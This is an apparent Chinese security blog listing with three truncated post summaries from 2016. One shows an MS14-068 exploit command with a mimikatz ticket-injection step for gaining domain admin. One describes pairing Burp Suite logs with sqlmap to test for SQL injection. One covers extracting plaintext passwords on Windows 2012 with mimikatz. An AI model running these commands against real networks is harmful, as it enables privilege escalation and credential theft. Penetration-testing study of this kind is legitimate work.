摘要: 可以让任何域内用户提升为域管理员 c:\python27\python.exe ms14-068.py -u k8test3@k8.local -p k8team!@# -s S-1-5-21-4191298166-3247023184-3514116461-1110 -d K8DNS.k8.localmimikatz.exe "kerberos::ptc TGT_k8test3@k8.... 阅读全文
posted @ 2016-04-12 15:05 h4ck0ne 阅读(2717) 评论(0) 推荐(0) 编辑
摘要: 其实我们在众测的时候完全可以使用burpsuite联合sqlmap测试目标的注入漏洞。对get和post型注入都支持。 先来记录proxy的log , 记住路径 把proxy拦截关掉 接下来浏览器配置代理,对目标站点一通请求,我一般都找页面比较偏僻的小功能 sqlmap对log一通测试 python sqlmap.py -l c:\log... 阅读全文
posted @ 2016-04-12 14:32 h4ck0ne 阅读(3658) 评论(0) 推荐(0) 编辑
摘要: windows 2012 抓明文密码方法 默认配置是抓不到明文密码了,神器mimikatz显示Password为null Authentication Id : 0 ; 121279 (00000000:0001d9bf) Session : ... 阅读全文
posted @ 2016-04-12 14:31 h4ck0ne 阅读(3868) 评论(0) 推荐(0) 编辑